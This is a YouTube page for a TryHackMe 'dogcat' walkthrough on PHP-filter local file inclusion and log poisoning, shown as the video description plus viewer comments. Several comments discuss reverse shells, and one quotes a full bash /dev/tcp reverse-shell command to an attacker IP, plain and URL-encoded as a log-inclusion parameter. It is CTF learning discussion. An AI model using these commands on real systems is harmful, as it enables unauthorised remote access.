TryHackMe! DOGCAT - PHP Filters for Local File Inclusion

  • Added 28. 08. 2024
  • If you would like to support me, please like, comment & subscribe, and check me out on Patreon: / johnhammond010
    E-mail: johnhammond010@gmail.com
    PayPal: paypal.me/johnh...
    GitHub: github.com/Joh...
    Site: www.johnhammond...
    Twitter: / _johnhammond

Comments • 96

  • @tsustyle6263 4 years ago +85

    Real talk, I learn more from John's videos than I do from any kind of infosec "course". Absolutely brilliant stuff.

  • @eklypzn 4 years ago +11

    Your vids with your first attempt are my favorite. I enjoy watching you get stumped for a bit and figuring out the next avenue. Thanks for expanding my mind on a regular basis.

  • @bibigabuyo1654 4 years ago +12

    I so much love the way you explain and how you try several methods. The video is very relatable showing that we are allowed to try and fail and try again.. very very cool specially the Recap in the end. Thanks so much ! 🙏🏻

    • @_JohnHammond 4 years ago +2

      Ah that is very sweet, thank YOU! Appreciate all the kind words, thanks for watching!

  • @proxikal 3 years ago +8

    Great playlist so far! One of the best learning experiences I've had so far in this field. Everyone else appears to have practiced every box multiple times before streaming. So if we face any issues at all (as they probably did behind screens) we're in the sinker. However, showing the mistakes and the steps to get around or out of any situation is priceless in my opinion. As it shows the method of thinking behind diagnosing what the issue is and what routes you can take to rectify the situation as a professional does. Keep up the great work man!

  • @jelluh24 4 years ago +63

    Can you make a video where you haven't done a tryhackme box in advance? I like watching you go through the problem solving part instead of just showing how you did it before.

    • @_JohnHammond 4 years ago +51

      I might start to do some stuff like that on Twitch, so I can fumble and fail and not be too concerned with it. Would that work?

    • @jelluh24 4 years ago +6

      @_JohnHammond yeah I would definitely watch that!

    • @tristanwild1313 4 years ago +5

      @_JohnHammond that would be great! :D

    • @prathameshtakane7354 4 years ago +1

      i like this quick highlight of the solution you figured out if i like the highlights i will go to twitch to watch the whole thing, so please keep uploading highlights here, great job.

    • @novanuke1356 4 years ago +1

      @_JohnHammond I really enjoyed the one you did on May 20th, I was a little disappointed because I missed it when it was live.

  • @karelmirim5547 4 years ago +83

    *script finishes in a minute* "It has finished in just under an hour." Interpret however you like.

    • @djhris9533 4 years ago

      Haha yes

    • @_JohnHammond 4 years ago +16

      Whoops! I don't even know what I say when I do these things bahaha

    • @ari_archer 3 years ago

      oHHHHHH, this got me confused

    • @tylercoombs1 3 years ago

      LOL! I kinda did a lazy double take on that one

  • @shadow201011 4 years ago +9

    @21:00 It removes the whitespace, because in the Python code you have x.strip(), if you remove strip() function you will get the PHP file with whitespaces in it.
    I also had to do some utf-8 encoding/decoding before sending it to the server (although I think that's not really important i think), and it worked!
    Thanks for the great content

    • @lo-tr2zn 2 years ago

      this is some good stuff

  • @markgacoka9704 4 years ago +17

    Terminal: [Finished in 56.9 s]
    Hammond: Finished in just under an hour...

    • @_JohnHammond 4 years ago +7

      Ah jeez. I don't even know what I say when recording. Bahahah

    • @gamingnerd8684 4 years ago +3

      @_JohnHammond i felt bad cuz it didn't work and i thought it genuinely took an hour

  • @erin1569 3 years ago +1

    I like it even more if you don't know the answer right away, seeing you wander in the dark makes me learn a lot.

  • @kalebfenley1199 a year ago

    I know it's an old video, but I've been trying to do this CTF all day. Watching other videos, and reading write-ups on this exact one. I couldn't get anything else working until I found your video. I kept breaking my apache logs like you explained.
    Anyway, good stuff. Keep it up man.

  • @ElliotWeishaar 4 years ago

    Loving the videos. Just caught the bug. Loving the fact names that John gives to symbols even more ( '

  • @guyc10 4 years ago +1

    That was one of my favorite videos you did, awesome, learned a lot from it. Thank you for sharing

  • @junhongchoo5990 4 years ago

    I was doing a similar box yesterday and spent the whole day learning the log poisoning technique (even though I got it working in the end, I didn't fully understand why).
    If only I had watched this video yesterday, I could have saved a day's worth of researching.
    Your videos are awesome and very informative for beginners/hobbyists. Looking forward to learning more from you :)

  • @sneezeman 4 years ago +4

    You could use the php $_GET to curl a reverse shell from your own machine and pipe that to php to get a shell

  • @IsmaelVazquezJr 4 years ago +4

    That thumbnail doe!! 🔥

  • @maurox1614 2 years ago +1

    Code execution using the log file and the user agent is mind-blowing! Where the hell do you find those solutions??
    I love the way how you "hackers" think outside the box, you are really genius guys!

  • @sephmaddock a year ago

    I love the way this guy navigates thru the OS. I have Ubuntu, Kali and Windows 10. lol Trying to master 3 at the same time.

  • @kennethcamacho4998 a month ago

    this guy is the real deal

  • @coolhandjake 4 years ago

    Half the time I don’t know what’s going on but its entertaining watching him hack things with such ease

  • @Mustafaq9 4 years ago +5

    Just a quick question because I'm not sure what I'm missing: why not just send the whole file over in one request as base64 instead of sending it as individual lines?

  • @genezisdj 2 years ago

    the big inspirator thxxx jhonn

  • @Sami-xv8ve 4 years ago +7

    nooo, what happened with the original one, i watched you make it for hours.

  • @finesseandstyle 4 years ago +6

    16:37 What's the purpose of base64 encoding? You can write text into a file so what's the issue?

    • @ProBarokis 3 years ago +4

      so he can escape special characters

  • @rainerzufall4268 a year ago

    I love your Python coding in the Videos

  • @DaniSpeh 3 years ago +1

    Beginner question: Why do you need to base64 encode it and then after you've uploaded it, decode again? Some source why you have to do this?

  • @shivangraina9698 4 years ago

    Dude i am learning so much from you.. Thanks 🙏🙇

  • @VEKTOR299 4 years ago +1

    Amazing video, very entertained, you are a genius, a total code and hacking wizard

  • @HAGSLAB 3 years ago

    I did this room today and had a bumpy ride, then I watched this video and saw you struggle with some of the same things which was kind of nice to be honest 😅

  • @stackoverflow2155 3 years ago +1

    I really enjoyed the tutorial and I thought the "mishaps" were actually educational.

  • @manamebob 2 years ago

    awesome content keep up the great work

  • @jaywandery9269 10 months ago

    This room gave me a hard time

  • @MrRafsan0 4 years ago

    Love your videos. Love From Bangladesh ❤

  • @neilthomas5026 4 years ago +1

    Very cool as always thanks for making this stuff really helps noobs like me :)

    • @imofo 4 years ago

      Haha why noob :)

  • @manjoos4906 4 years ago +1

    what the hell this is medium difficulty??

  • @mattplaygamez 3 years ago +1

    John you don't need to have python. You can also type 'bash -i'

  • @yashithabanu7173 3 years ago

    Really Great !!!

  • @camw9354 4 years ago

    Can't wait

  • @LahcenTahiri 3 years ago

    that is huge man

  • @mateenkiani6858 4 years ago

    Great stuff!

  • @claudiafischering901 3 years ago

    I checkout if it possible on my apache2 server or if is fixed already...that is scary!

  • @olivermanyasa9386 4 years ago

    That was a nice one

  • @nikohegeheiskanen 4 years ago

    Pretty sure the & doesn't get url encoded when you put it in the url, which breaks stuff, so that's probably why the reverse shell wasn't working

  • @thatonesilverfuck6954 4 years ago

    Protip, urlencoding the first payload you tried 'bash ×××××××' works.

    • @_JohnHammond 4 years ago

      Oh NICE! Good to know, thank you!

    • @carbajal17 4 years ago

      Hi, can you pls provide how urlencoding worked for you?
      I tried encoding "bash -i >& /dev/tcp/10.1.12.155/9001 0>&1" and got:
      ..access.log&ext&c=bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.1.12.155%2F9001+0%3E%261
      But no go :( , nc lvnp did not respond.
      Thanks!

  • @hoodietramp 2 years ago

    Cool thing

  • @giovannitomczak6826 3 years ago

    I keep getting a "fatal flaw" error when accessing the access.log. Anyone else?

  • @TheNajuda 4 years ago

    How did you know when it was broken, just because it wasn't receiving the variable? I made a mistake writing the code for that, but it was difficult to spot, since it does not show any error; the variable just didn't receive any value, so it didn't show me anything. It did show me the part "system(): Cannot execute a blank command in", so I thought everything was done right and didn't know I wrote the code wrong. Was it the same for you, or did it show something for you? Thanks for your tutorials, they are nice!

  • @rlee431 4 years ago

    Great job. How would you rate the difficulty of this box with the ones on the oscp?

    • @westernvibes1267 4 years ago

      This is a box based on one technique for escalating to rce from lfi. There are tons of techniques to turn lfi to rce. Sometimes through sending a mail to a smtp server with php codes too. This is like 10% of a single oscp exam box. But if you're really curious about the difficulty of oscp labs and exam boxes, they are easy-medium boxes of hackthebox.

  • @0oOskar 4 years ago

    Ok sorry if this question seems very dumb but I'm just trying to learn, would it be possible to use a tool like gobuster to find the "hidden" addresses on the page? instead of manually looking for them?

    • @michaelcox722 3 years ago

      Yes it would. There's more than one way to skin a cat.

  • @andy-bandy 4 years ago

    You're a fucking beast, love it

  • @weiiswurst 4 years ago

    Why do you prefer Sublime Text over VS Code?

  • @dev__004 a year ago

    My guess is that everyone who did the box broke the access.log at least one time lol

  • @allandiego1446 4 years ago

    this shell doesn't work in pentestbox do you know any way to do it?return the error 101

  • @adamhuk3624 4 years ago

    An hour?? A minute looking at your clock

  • @danielhemmati 4 years ago

    that was epic 😎

  • @ino145 4 years ago

    I really wanna learn this but no idea where to start. I once downloaded Kali a long time ago, but yeah, no idea what I was doing. :D I've always been on Win machines also, so don't know any code etc. I know basic. ls, dir, cd.. And is it still safe to install Kali(and probably a vm)

  • @user-wd3ng2pt3z 3 years ago

    thanks bro, but i hope to upload scripts file that related with your videos.

  • @socomplicated808 4 years ago

    can you do the skynet room on tryhackme? would be appreciated?

  • @SebastianHasch 3 years ago

    'Comment button'

  • @javadmv1181 3 years ago

    you tried a lot, but the reverse shell upload is not that hard in this machine.

  • @Khusyasy 3 years ago

    watching this video makes me feel like a hacker, even though i never used linux 🤣

  • @user-tz8yw6kg8f 4 years ago

    11:50 it may have worked with python, you did (“)” instead of (“”)

  • @arcanj0 4 years ago

    That was hard (for me)

  • @hyperdrone900 4 years ago

    since you have a rce on that box, why not upload any shell source on a text hosting site like pastebin then curl/wget that file to that box xD

  • @hakoo2700 3 years ago

    ❤🤚

  • @abdiwahabahmedomar2399

    Wow Good job 🎉🎉🎉

  • @rajeshwaris6663 4 years ago

    Try perl rev shell

  • @lordykarus 4 years ago

    Wizard

  • @VDViktor a year ago

    The amount of time someone like John spent on it, the amount of coding involved and techniques used, makes me suspect that this shouldn't be classified as an "easy" room on THM lol